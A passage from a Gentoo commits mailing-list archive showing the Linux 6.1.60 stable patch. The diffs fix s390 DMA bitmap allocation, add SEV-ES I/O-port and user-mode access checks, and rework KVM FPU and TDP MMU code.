+diff --git a/tools/include/linux/rwsem.h b/tools/include/linux/rwsem.h
+new file mode 100644
+index 0000000000000..83971b3cbfced
+--- /dev/null
++++ b/tools/include/linux/rwsem.h
+@@ -0,0 +1,40 @@
++/* SPDX-License-Identifier: GPL-2.0+ */
++#ifndef _TOOLS__RWSEM_H
++#define _TOOLS__RWSEM_H
++
++#include <pthread.h>
++
++struct rw_semaphore {
++	pthread_rwlock_t lock;
++};
++
++static inline int init_rwsem(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_init(&sem->lock, NULL);
++}
++
++static inline int exit_rwsem(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_destroy(&sem->lock);
++}
++
++static inline int down_read(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_rdlock(&sem->lock);
++}
++
++static inline int up_read(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_unlock(&sem->lock);
++}
++
++static inline int down_write(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_wrlock(&sem->lock);
++}
++
++static inline int up_write(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_unlock(&sem->lock);
++}
++#endif /* _TOOLS_RWSEM_H */
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index f8008ab31eef0..cb363b507a329 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -2478,7 +2478,7 @@ static bool is_special_call(struct instruction *insn)
+ 		if (!dest)
+ 			return false;
+ 
+-		if (dest->fentry)
++		if (dest->fentry || dest->embedded_insn)
+ 			return true;
+ 	}
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-25 11:36 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-25 11:36 UTC (permalink / raw
  To: gentoo-commits

commit:     30e2e1091dabb8528ac7b07794108734ea32183f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Oct 25 11:36:26 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Oct 25 11:36:26 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=30e2e109

Linux patch 6.1.60

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1059_linux-6.1.60.patch | 7686 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7690 insertions(+)

diff --git a/0000_README b/0000_README
index 2db06d5c..a3b5d2f0 100644
--- a/0000_README
+++ b/0000_README
@@ -279,6 +279,10 @@ Patch:  1058_linux-6.1.59.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.59
 
+Patch:  1059_linux-6.1.60.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.60
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1059_linux-6.1.60.patch b/1059_linux-6.1.60.patch
new file mode 100644
index 00000000..512a62e4
--- /dev/null
+++ b/1059_linux-6.1.60.patch
@@ -0,0 +1,7686 @@
+diff --git a/Documentation/devicetree/bindings/mmc/sdhci-msm.yaml b/Documentation/devicetree/bindings/mmc/sdhci-msm.yaml
+index a96f143479c79..eb0e9cca70570 100644
+--- a/Documentation/devicetree/bindings/mmc/sdhci-msm.yaml
++++ b/Documentation/devicetree/bindings/mmc/sdhci-msm.yaml
+@@ -59,7 +59,7 @@ properties:
+     maxItems: 4
+ 
+   clocks:
+-    minItems: 3
++    minItems: 2
+     items:
+       - description: Main peripheral bus clock, PCLK/HCLK - AHB Bus clock
+       - description: SDC MMC clock, MCLK
+diff --git a/Makefile b/Makefile
+index 4ad29c852e5f8..d47edcd8888e8 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 59
++SUBLEVEL = 60
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/motorola-mapphone-common.dtsi b/arch/arm/boot/dts/motorola-mapphone-common.dtsi
+index d69f0f4b4990d..d2d516d113baa 100644
+--- a/arch/arm/boot/dts/motorola-mapphone-common.dtsi
++++ b/arch/arm/boot/dts/motorola-mapphone-common.dtsi
+@@ -640,6 +640,7 @@
+ &uart3 {
+ 	interrupts-extended = <&wakeupgen GIC_SPI 74 IRQ_TYPE_LEVEL_HIGH
+ 			       &omap4_pmx_core 0x17c>;
++	overrun-throttle-ms = <500>;
+ };
+ 
+ &uart4 {
+diff --git a/arch/s390/pci/pci_dma.c b/arch/s390/pci/pci_dma.c
+index 227cf0a62800b..486aa03abbe17 100644
+--- a/arch/s390/pci/pci_dma.c
++++ b/arch/s390/pci/pci_dma.c
+@@ -544,6 +544,17 @@ static void s390_dma_unmap_sg(struct device *dev, struct scatterlist *sg,
+ 		s->dma_length = 0;
+ 	}
+ }
++
++static unsigned long *bitmap_vzalloc(size_t bits, gfp_t flags)
++{
++	size_t n = BITS_TO_LONGS(bits);
++	size_t bytes;
++
++	if (unlikely(check_mul_overflow(n, sizeof(unsigned long), &bytes)))
++		return NULL;
++
++	return vzalloc(bytes);
++}
+ 	
+ int zpci_dma_init_device(struct zpci_dev *zdev)
+ {
+@@ -584,13 +595,13 @@ int zpci_dma_init_device(struct zpci_dev *zdev)
+ 				zdev->end_dma - zdev->start_dma + 1);
+ 	zdev->end_dma = zdev->start_dma + zdev->iommu_size - 1;
+ 	zdev->iommu_pages = zdev->iommu_size >> PAGE_SHIFT;
+-	zdev->iommu_bitmap = vzalloc(zdev->iommu_pages / 8);
++	zdev->iommu_bitmap = bitmap_vzalloc(zdev->iommu_pages, GFP_KERNEL);
+ 	if (!zdev->iommu_bitmap) {
+ 		rc = -ENOMEM;
+ 		goto free_dma_table;
+ 	}
+ 	if (!s390_iommu_strict) {
+-		zdev->lazy_bitmap = vzalloc(zdev->iommu_pages / 8);
++		zdev->lazy_bitmap = bitmap_vzalloc(zdev->iommu_pages, GFP_KERNEL);
+ 		if (!zdev->lazy_bitmap) {
+ 			rc = -ENOMEM;
+ 			goto free_bitmap;
+diff --git a/arch/x86/boot/compressed/sev.c b/arch/x86/boot/compressed/sev.c
+index e65f0968e0d9d..9c91cc40f4565 100644
+--- a/arch/x86/boot/compressed/sev.c
++++ b/arch/x86/boot/compressed/sev.c
+@@ -103,6 +103,16 @@ static enum es_result vc_read_mem(struct es_em_ctxt *ctxt,
+ 	return ES_OK;
+ }
+ 
++static enum es_result vc_ioio_check(struct es_em_ctxt *ctxt, u16 port, size_t size)
++{
++	return ES_OK;
++}
++
++static bool fault_in_kernel_space(unsigned long address)
++{
++	return false;
++}
++
+ #undef __init
+ #undef __pa
+ #define __init
+diff --git a/arch/x86/include/asm/fpu/api.h b/arch/x86/include/asm/fpu/api.h
+index b475d9a582b88..e829fa4c6788e 100644
+--- a/arch/x86/include/asm/fpu/api.h
++++ b/arch/x86/include/asm/fpu/api.h
+@@ -148,7 +148,8 @@ static inline void fpu_update_guest_xfd(struct fpu_guest *guest_fpu, u64 xfd) {
+ static inline void fpu_sync_guest_vmexit_xfd_state(void) { }
+ #endif
+ 
+-extern void fpu_copy_guest_fpstate_to_uabi(struct fpu_guest *gfpu, void *buf, unsigned int size, u32 pkru);
++extern void fpu_copy_guest_fpstate_to_uabi(struct fpu_guest *gfpu, void *buf,
++					   unsigned int size, u64 xfeatures, u32 pkru);
+ extern int fpu_copy_uabi_to_guest_fpstate(struct fpu_guest *gfpu, const void *buf, u64 xcr0, u32 *vpkru);
+ 
+ static inline void fpstate_set_confidential(struct fpu_guest *gfpu)
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index 08a84f801bfea..c1dcaa3d2d6eb 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1324,7 +1324,6 @@ struct kvm_arch {
+ 	 * the thread holds the MMU lock in write mode.
+ 	 */
+ 	spinlock_t tdp_mmu_pages_lock;
+-	struct workqueue_struct *tdp_mmu_zap_wq;
+ #endif /* CONFIG_X86_64 */
+ 
+ 	/*
+@@ -1727,7 +1726,7 @@ void kvm_mmu_vendor_module_exit(void);
+ 
+ void kvm_mmu_destroy(struct kvm_vcpu *vcpu);
+ int kvm_mmu_create(struct kvm_vcpu *vcpu);
+-int kvm_mmu_init_vm(struct kvm *kvm);
++void kvm_mmu_init_vm(struct kvm *kvm);
+ void kvm_mmu_uninit_vm(struct kvm *kvm);
+ 
+ void kvm_mmu_after_set_cpuid(struct kvm_vcpu *vcpu);
+diff --git a/arch/x86/include/asm/svm.h b/arch/x86/include/asm/svm.h
+index 02aac78cb21d4..184fd776cd39f 100644
+--- a/arch/x86/include/asm/svm.h
++++ b/arch/x86/include/asm/svm.h
+@@ -259,6 +259,7 @@ enum avic_ipi_failure_cause {
+ 	AVIC_IPI_FAILURE_TARGET_NOT_RUNNING,
+ 	AVIC_IPI_FAILURE_INVALID_TARGET,
+ 	AVIC_IPI_FAILURE_INVALID_BACKING_PAGE,
++	AVIC_IPI_FAILURE_INVALID_IPI_VECTOR,
+ };
+ 
+ #define AVIC_PHYSICAL_MAX_INDEX_MASK	GENMASK_ULL(8, 0)
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index a083f9ac9e4f6..1d190761d00fd 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -369,14 +369,15 @@ int fpu_swap_kvm_fpstate(struct fpu_guest *guest_fpu, bool enter_guest)
+ EXPORT_SYMBOL_GPL(fpu_swap_kvm_fpstate);
+ 
+ void fpu_copy_guest_fpstate_to_uabi(struct fpu_guest *gfpu, void *buf,
+-				    unsigned int size, u32 pkru)
++				    unsigned int size, u64 xfeatures, u32 pkru)
+ {
+ 	struct fpstate *kstate = gfpu->fpstate;
+ 	union fpregs_state *ustate = buf;
+ 	struct membuf mb = { .p = buf, .left = size };
+ 
+ 	if (cpu_feature_enabled(X86_FEATURE_XSAVE)) {
+-		__copy_xstate_to_uabi_buf(mb, kstate, pkru, XSTATE_COPY_XSAVE);
++		__copy_xstate_to_uabi_buf(mb, kstate, xfeatures, pkru,
++					  XSTATE_COPY_XSAVE);
+ 	} else {
+ 		memcpy(&ustate->fxsave, &kstate->regs.fxsave,
+ 		       sizeof(ustate->fxsave));
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 1afbc4866b100..ebe698f8af73b 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -1053,6 +1053,7 @@ static void copy_feature(bool from_xstate, struct membuf *to, void *xstate,
+  * __copy_xstate_to_uabi_buf - Copy kernel saved xstate to a UABI buffer
+  * @to:		membuf descriptor
+  * @fpstate:	The fpstate buffer from which to copy
++ * @xfeatures:	The mask of xfeatures to save (XSAVE mode only)
+  * @pkru_val:	The PKRU value to store in the PKRU component
+  * @copy_mode:	The requested copy mode
+  *
+@@ -1063,7 +1064,8 @@ static void copy_feature(bool from_xstate, struct membuf *to, void *xstate,
+  * It supports partial copy but @to.pos always starts from zero.
+  */
+ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+-			       u32 pkru_val, enum xstate_copy_mode copy_mode)
++			       u64 xfeatures, u32 pkru_val,
++			       enum xstate_copy_mode copy_mode)
+ {
+ 	const unsigned int off_mxcsr = offsetof(struct fxregs_state, mxcsr);
+ 	struct xregs_state *xinit = &init_fpstate.regs.xsave;
+@@ -1087,7 +1089,7 @@ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 		break;
+ 
+ 	case XSTATE_COPY_XSAVE:
+-		header.xfeatures &= fpstate->user_xfeatures;
++		header.xfeatures &= fpstate->user_xfeatures & xfeatures;
+ 		break;
+ 	}
+ 
+@@ -1189,6 +1191,7 @@ void copy_xstate_to_uabi_buf(struct membuf to, struct task_struct *tsk,
+ 			     enum xstate_copy_mode copy_mode)
+ {
+ 	__copy_xstate_to_uabi_buf(to, tsk->thread.fpu.fpstate,
++				  tsk->thread.fpu.fpstate->user_xfeatures,
+ 				  tsk->thread.pkru, copy_mode);
+ }
+ 
+@@ -1540,10 +1543,7 @@ static int fpstate_realloc(u64 xfeatures, unsigned int ksize,
+ 		fpregs_restore_userregs();
+ 
+ 	newfps->xfeatures = curfps->xfeatures | xfeatures;
+-
+-	if (!guest_fpu)
+-		newfps->user_xfeatures = curfps->user_xfeatures | xfeatures;
+-
++	newfps->user_xfeatures = curfps->user_xfeatures | xfeatures;
+ 	newfps->xfd = curfps->xfd & ~xfeatures;
+ 
+ 	/* Do the final updates within the locked region */
+diff --git a/arch/x86/kernel/fpu/xstate.h b/arch/x86/kernel/fpu/xstate.h
+index a4ecb04d8d646..3518fb26d06b0 100644
+--- a/arch/x86/kernel/fpu/xstate.h
++++ b/arch/x86/kernel/fpu/xstate.h
+@@ -43,7 +43,8 @@ enum xstate_copy_mode {
+ 
+ struct membuf;
+ extern void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+-				      u32 pkru_val, enum xstate_copy_mode copy_mode);
++				      u64 xfeatures, u32 pkru_val,
++				      enum xstate_copy_mode copy_mode);
+ extern void copy_xstate_to_uabi_buf(struct membuf to, struct task_struct *tsk,
+ 				    enum xstate_copy_mode mode);
+ extern int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf, u32 *pkru);
+diff --git a/arch/x86/kernel/sev-shared.c b/arch/x86/kernel/sev-shared.c
+index 7dce812ce2538..71d8698702ce3 100644
+--- a/arch/x86/kernel/sev-shared.c
++++ b/arch/x86/kernel/sev-shared.c
+@@ -629,6 +629,23 @@ fail:
+ 	sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SEV_ES_GEN_REQ);
+ }
+ 
++static enum es_result vc_insn_string_check(struct es_em_ctxt *ctxt,
++					   unsigned long address,
++					   bool write)
++{
++	if (user_mode(ctxt->regs) && fault_in_kernel_space(address)) {
++		ctxt->fi.vector     = X86_TRAP_PF;
++		ctxt->fi.error_code = X86_PF_USER;
++		ctxt->fi.cr2        = address;
++		if (write)
++			ctxt->fi.error_code |= X86_PF_WRITE;
++
++		return ES_EXCEPTION;
++	}
++
++	return ES_OK;
++}
++
+ static enum es_result vc_insn_string_read(struct es_em_ctxt *ctxt,
+ 					  void *src, char *buf,
+ 					  unsigned int data_size,
+@@ -636,7 +653,12 @@ static enum es_result vc_insn_string_read(struct es_em_ctxt *ctxt,
+ 					  bool backwards)
+ {
+ 	int i, b = backwards ? -1 : 1;
+-	enum es_result ret = ES_OK;
++	unsigned long address = (unsigned long)src;
++	enum es_result ret;
++
++	ret = vc_insn_string_check(ctxt, address, false);
++	if (ret != ES_OK)
++		return ret;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		void *s = src + (i * data_size * b);
+@@ -657,7 +679,12 @@ static enum es_result vc_insn_string_write(struct es_em_ctxt *ctxt,
+ 					   bool backwards)
+ {
+ 	int i, s = backwards ? -1 : 1;
+-	enum es_result ret = ES_OK;
++	unsigned long address = (unsigned long)dst;
++	enum es_result ret;
++
++	ret = vc_insn_string_check(ctxt, address, true);
++	if (ret != ES_OK)
++		return ret;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		void *d = dst + (i * data_size * s);
+@@ -693,6 +720,9 @@ static enum es_result vc_insn_string_write(struct es_em_ctxt *ctxt,
+ static enum es_result vc_ioio_exitinfo(struct es_em_ctxt *ctxt, u64 *exitinfo)
+ {
+ 	struct insn *insn = &ctxt->insn;
++	size_t size;
++	u64 port;
++
+ 	*exitinfo = 0;
+ 
+ 	switch (insn->opcode.bytes[0]) {
+@@ -701,7 +731,7 @@ static enum es_result vc_ioio_exitinfo(struct es_em_ctxt *ctxt, u64 *exitinfo)
+ 	case 0x6d:
+ 		*exitinfo |= IOIO_TYPE_INS;
+ 		*exitinfo |= IOIO_SEG_ES;
+-		*exitinfo |= (ctxt->regs->dx & 0xffff) << 16;
++		port	   = ctxt->regs->dx & 0xffff;
+ 		break;
+ 
+ 	/* OUTS opcodes */
+@@ -709,41 +739,43 @@ static enum es_result vc_ioio_exitinfo(struct es_em_ctxt *ctxt, u64 *exitinfo)
+ 	case 0x6f:
+ 		*exitinfo |= IOIO_TYPE_OUTS;
+ 		*exitinfo |= IOIO_SEG_DS;
+-		*exitinfo |= (ctxt->regs->dx & 0xffff) << 16;
++		port	   = ctxt->regs->dx & 0xffff;
+ 		break;
+ 
+ 	/* IN immediate opcodes */
+ 	case 0xe4:
+ 	case 0xe5:
+ 		*exitinfo |= IOIO_TYPE_IN;
+-		*exitinfo |= (u8)insn->immediate.value << 16;
++		port	   = (u8)insn->immediate.value & 0xffff;
+ 		break;
+ 
+ 	/* OUT immediate opcodes */
+ 	case 0xe6:
+ 	case 0xe7:
+ 		*exitinfo |= IOIO_TYPE_OUT;
+-		*exitinfo |= (u8)insn->immediate.value << 16;
++		port	   = (u8)insn->immediate.value & 0xffff;
+ 		break;
+ 
+ 	/* IN register opcodes */
+ 	case 0xec:
+ 	case 0xed:
+ 		*exitinfo |= IOIO_TYPE_IN;
+-		*exitinfo |= (ctxt->regs->dx & 0xffff) << 16;
++		port	   = ctxt->regs->dx & 0xffff;
+ 		break;
+ 
+ 	/* OUT register opcodes */
+ 	case 0xee:
+ 	case 0xef:
+ 		*exitinfo |= IOIO_TYPE_OUT;
+-		*exitinfo |= (ctxt->regs->dx & 0xffff) << 16;
++		port	   = ctxt->regs->dx & 0xffff;
+ 		break;
+ 
+ 	default:
+ 		return ES_DECODE_FAILED;
+ 	}
+ 
++	*exitinfo |= port << 16;
++
+ 	switch (insn->opcode.bytes[0]) {
+ 	case 0x6c:
+ 	case 0x6e:
+@@ -753,12 +785,15 @@ static enum es_result vc_ioio_exitinfo(struct es_em_ctxt *ctxt, u64 *exitinfo)
+ 	case 0xee:
+ 		/* Single byte opcodes */
+ 		*exitinfo |= IOIO_DATA_8;
++		size       = 1;
+ 		break;
+ 	default:
+ 		/* Length determined by instruction parsing */
+ 		*exitinfo |= (insn->opnd_bytes == 2) ? IOIO_DATA_16
+ 						     : IOIO_DATA_32;
++		size       = (insn->opnd_bytes == 2) ? 2 : 4;
+ 	}
++
+ 	switch (insn->addr_bytes) {
+ 	case 2:
+ 		*exitinfo |= IOIO_ADDR_16;
+@@ -774,7 +809,7 @@ static enum es_result vc_ioio_exitinfo(struct es_em_ctxt *ctxt, u64 *exitinfo)
+ 	if (insn_has_rep_prefix(insn))
+ 		*exitinfo |= IOIO_REP;
+ 
+-	return ES_OK;
++	return vc_ioio_check(ctxt, (u16)port, size);
+ }
+ 
+ static enum es_result vc_handle_ioio(struct ghcb *ghcb, struct es_em_ctxt *ctxt)
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index afda719dd7253..e7968c41ecf57 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -512,6 +512,33 @@ static enum es_result vc_slow_virt_to_phys(struct ghcb *ghcb, struct es_em_ctxt
+ 	return ES_OK;
+ }
+ 
++static enum es_result vc_ioio_check(struct es_em_ctxt *ctxt, u16 port, size_t size)
++{
++	BUG_ON(size > 4);
++
++	if (user_mode(ctxt->regs)) {
++		struct thread_struct *t = &current->thread;
++		struct io_bitmap *iobm = t->io_bitmap;
++		size_t idx;
++
++		if (!iobm)
++			goto fault;
++
++		for (idx = port; idx < port + size; ++idx) {
++			if (test_bit(idx, iobm->bitmap))
++				goto fault;
++		}
++	}
++
++	return ES_OK;
++
++fault:
++	ctxt->fi.vector = X86_TRAP_GP;
++	ctxt->fi.error_code = 0;
++
++	return ES_EXCEPTION;
++}
++
+ /* Include code shared with pre-decompression boot stage */
+ #include "sev-shared.c"
+ 
+@@ -1552,6 +1579,9 @@ static enum es_result vc_handle_mmio(struct ghcb *ghcb, struct es_em_ctxt *ctxt)
+ 			return ES_DECODE_FAILED;
+ 	}
+ 
++	if (user_mode(ctxt->regs))
++		return ES_UNSUPPORTED;
++
+ 	switch (mmio) {
+ 	case MMIO_WRITE:
+ 		memcpy(ghcb->shared_buffer, reg_data, bytes);
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index 7b4224f5ee2de..c3ef1fc602bf9 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -338,14 +338,6 @@ static void kvm_vcpu_after_set_cpuid(struct kvm_vcpu *vcpu)
+ 	vcpu->arch.guest_supported_xcr0 =
+ 		cpuid_get_supported_xcr0(vcpu->arch.cpuid_entries, vcpu->arch.cpuid_nent);
+ 
+-	/*
+-	 * FP+SSE can always be saved/restored via KVM_{G,S}ET_XSAVE, even if
+-	 * XSAVE/XCRO are not exposed to the guest, and even if XSAVE isn't
+-	 * supported by the host.
+-	 */
+-	vcpu->arch.guest_fpu.fpstate->user_xfeatures = vcpu->arch.guest_supported_xcr0 |
+-						       XFEATURE_MASK_FPSSE;
+-
+ 	kvm_update_pv_runtime(vcpu);
+ 
+ 	vcpu->arch.maxphyaddr = cpuid_query_maxphyaddr(vcpu);
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index 68eba393842f5..7e8dbd54869a6 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2535,13 +2535,17 @@ int kvm_apic_local_deliver(struct kvm_lapic *apic, int lvt_type)
+ {
+ 	u32 reg = kvm_lapic_get_reg(apic, lvt_type);
+ 	int vector, mode, trig_mode;
++	int r;
+ 
+ 	if (kvm_apic_hw_enabled(apic) && !(reg & APIC_LVT_MASKED)) {
+ 		vector = reg & APIC_VECTOR_MASK;
+ 		mode = reg & APIC_MODE_MASK;
+ 		trig_mode = reg & APIC_LVT_LEVEL_TRIGGER;
+-		return __apic_accept_irq(apic, mode, vector, 1, trig_mode,
+-					NULL);
++
++		r = __apic_accept_irq(apic, mode, vector, 1, trig_mode, NULL);
++		if (r && lvt_type == APIC_LVTPC)
++			kvm_lapic_set_reg(apic, APIC_LVTPC, reg | APIC_LVT_MASKED);
++		return r;
+ 	}
+ 	return 0;
+ }
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index 2a6fec4e2d196..d30325e297a03 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -5994,19 +5994,16 @@ static void kvm_mmu_invalidate_zap_pages_in_memslot(struct kvm *kvm,
+ 	kvm_mmu_zap_all_fast(kvm);
+ }
+ 
+-int kvm_mmu_init_vm(struct kvm *kvm)
++void kvm_mmu_init_vm(struct kvm *kvm)
+ {
+ 	struct kvm_page_track_notifier_node *node = &kvm->arch.mmu_sp_tracker;
+-	int r;
+ 
+ 	INIT_LIST_HEAD(&kvm->arch.active_mmu_pages);
+ 	INIT_LIST_HEAD(&kvm->arch.zapped_obsolete_pages);
+ 	INIT_LIST_HEAD(&kvm->arch.lpage_disallowed_mmu_pages);
+ 	spin_lock_init(&kvm->arch.mmu_unsync_pages_lock);
+ 
+-	r = kvm_mmu_init_tdp_mmu(kvm);
+-	if (r < 0)
+-		return r;
++	kvm_mmu_init_tdp_mmu(kvm);
+ 
+ 	node->track_write = kvm_mmu_pte_write;
+ 	node->track_flush_slot = kvm_mmu_invalidate_zap_pages_in_memslot;
+@@ -6019,8 +6016,6 @@ int kvm_mmu_init_vm(struct kvm *kvm)
+ 
+ 	kvm->arch.split_desc_cache.kmem_cache = pte_list_desc_cache;
+ 	kvm->arch.split_desc_cache.gfp_zero = __GFP_ZERO;
+-
+-	return 0;
+ }
+ 
+ static void mmu_free_vm_memory_caches(struct kvm *kvm)
+diff --git a/arch/x86/kvm/mmu/mmu_internal.h b/arch/x86/kvm/mmu/mmu_internal.h
+index 582def531d4d9..0a9d5f2925c33 100644
+--- a/arch/x86/kvm/mmu/mmu_internal.h
++++ b/arch/x86/kvm/mmu/mmu_internal.h
+@@ -56,7 +56,12 @@ struct kvm_mmu_page {
+ 
+ 	bool tdp_mmu_page;
+ 	bool unsync;
+-	u8 mmu_valid_gen;
++	union {
++		u8 mmu_valid_gen;
++
++		/* Only accessed under slots_lock.  */
++		bool tdp_mmu_scheduled_root_to_zap;
++	};
+ 	bool lpage_disallowed; /* Can't be replaced by an equiv large page */
+ 
+ 	/*
+@@ -92,13 +97,7 @@ struct kvm_mmu_page {
+ 		struct kvm_rmap_head parent_ptes; /* rmap pointers to parent sptes */
+ 		tdp_ptep_t ptep;
+ 	};
+-	union {
+-		DECLARE_BITMAP(unsync_child_bitmap, 512);
+-		struct {
+-			struct work_struct tdp_mmu_async_work;
+-			void *tdp_mmu_async_data;
+-		};
+-	};
++	DECLARE_BITMAP(unsync_child_bitmap, 512);
+ 
+ 	struct list_head lpage_disallowed_link;
+ #ifdef CONFIG_X86_32
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.c b/arch/x86/kvm/mmu/tdp_mmu.c
+index 9b9fc4e834d09..c3b0f973375b4 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.c
++++ b/arch/x86/kvm/mmu/tdp_mmu.c
+@@ -14,24 +14,16 @@ static bool __read_mostly tdp_mmu_enabled = true;
+ module_param_named(tdp_mmu, tdp_mmu_enabled, bool, 0644);
+ 
+ /* Initializes the TDP MMU for the VM, if enabled. */
+-int kvm_mmu_init_tdp_mmu(struct kvm *kvm)
++void kvm_mmu_init_tdp_mmu(struct kvm *kvm)
+ {
+-	struct workqueue_struct *wq;
+-
+ 	if (!tdp_enabled || !READ_ONCE(tdp_mmu_enabled))
+-		return 0;
+-
+-	wq = alloc_workqueue("kvm", WQ_UNBOUND|WQ_MEM_RECLAIM|WQ_CPU_INTENSIVE, 0);
+-	if (!wq)
+-		return -ENOMEM;
++		return;
+ 
+ 	/* This should not be changed for the lifetime of the VM. */
+ 	kvm->arch.tdp_mmu_enabled = true;
+ 	INIT_LIST_HEAD(&kvm->arch.tdp_mmu_roots);
+ 	spin_lock_init(&kvm->arch.tdp_mmu_pages_lock);
+ 	INIT_LIST_HEAD(&kvm->arch.tdp_mmu_pages);
+-	kvm->arch.tdp_mmu_zap_wq = wq;
+-	return 1;
+ }
+ 
+ /* Arbitrarily returns true so that this may be used in if statements. */
+@@ -57,20 +49,15 @@ void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm)
+ 	 * ultimately frees all roots.
+ 	 */
+ 	kvm_tdp_mmu_invalidate_all_roots(kvm);
+-
+-	/*
+-	 * Destroying a workqueue also first flushes the workqueue, i.e. no
+-	 * need to invoke kvm_tdp_mmu_zap_invalidated_roots().
+-	 */
+-	destroy_workqueue(kvm->arch.tdp_mmu_zap_wq);
++	kvm_tdp_mmu_zap_invalidated_roots(kvm);
+ 
+ 	WARN_ON(!list_empty(&kvm->arch.tdp_mmu_pages));
+ 	WARN_ON(!list_empty(&kvm->arch.tdp_mmu_roots));
+ 
+ 	/*
+ 	 * Ensure that all the outstanding RCU callbacks to free shadow pages
+-	 * can run before the VM is torn down.  Work items on tdp_mmu_zap_wq
+-	 * can call kvm_tdp_mmu_put_root and create new callbacks.
++	 * can run before the VM is torn down.  Putting the last reference to
++	 * zapped roots will create new callbacks.
+ 	 */
+ 	rcu_barrier();
+ }
+@@ -97,46 +84,6 @@ static void tdp_mmu_free_sp_rcu_callback(struct rcu_head *head)
+ 	tdp_mmu_free_sp(sp);
+ }
+ 
+-static void tdp_mmu_zap_root(struct kvm *kvm, struct kvm_mmu_page *root,
+-			     bool shared);
+-
+-static void tdp_mmu_zap_root_work(struct work_struct *work)
+-{
+-	struct kvm_mmu_page *root = container_of(work, struct kvm_mmu_page,
+-						 tdp_mmu_async_work);
+-	struct kvm *kvm = root->tdp_mmu_async_data;
+-
+-	read_lock(&kvm->mmu_lock);
+-
+-	/*
+-	 * A TLB flush is not necessary as KVM performs a local TLB flush when
+-	 * allocating a new root (see kvm_mmu_load()), and when migrating vCPU
+-	 * to a different pCPU.  Note, the local TLB flush on reuse also
+-	 * invalidates any paging-structure-cache entries, i.e. TLB entries for
+-	 * intermediate paging structures, that may be zapped, as such entries
+-	 * are associated with the ASID on both VMX and SVM.
+-	 */
+-	tdp_mmu_zap_root(kvm, root, true);
+-
+-	/*
+-	 * Drop the refcount using kvm_tdp_mmu_put_root() to test its logic for
+-	 * avoiding an infinite loop.  By design, the root is reachable while
+-	 * it's being asynchronously zapped, thus a different task can put its
+-	 * last reference, i.e. flowing through kvm_tdp_mmu_put_root() for an
+-	 * asynchronously zapped root is unavoidable.
+-	 */
+-	kvm_tdp_mmu_put_root(kvm, root, true);
+-
+-	read_unlock(&kvm->mmu_lock);
+-}
+-
+-static void tdp_mmu_schedule_zap_root(struct kvm *kvm, struct kvm_mmu_page *root)
+-{
+-	root->tdp_mmu_async_data = kvm;
+-	INIT_WORK(&root->tdp_mmu_async_work, tdp_mmu_zap_root_work);
+-	queue_work(kvm->arch.tdp_mmu_zap_wq, &root->tdp_mmu_async_work);
+-}
+-
+ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 			  bool shared)
+ {
+@@ -222,11 +169,11 @@ static struct kvm_mmu_page *tdp_mmu_next_root(struct kvm *kvm,
+ #define for_each_valid_tdp_mmu_root_yield_safe(_kvm, _root, _as_id, _shared)	\
+ 	__for_each_tdp_mmu_root_yield_safe(_kvm, _root, _as_id, _shared, true)
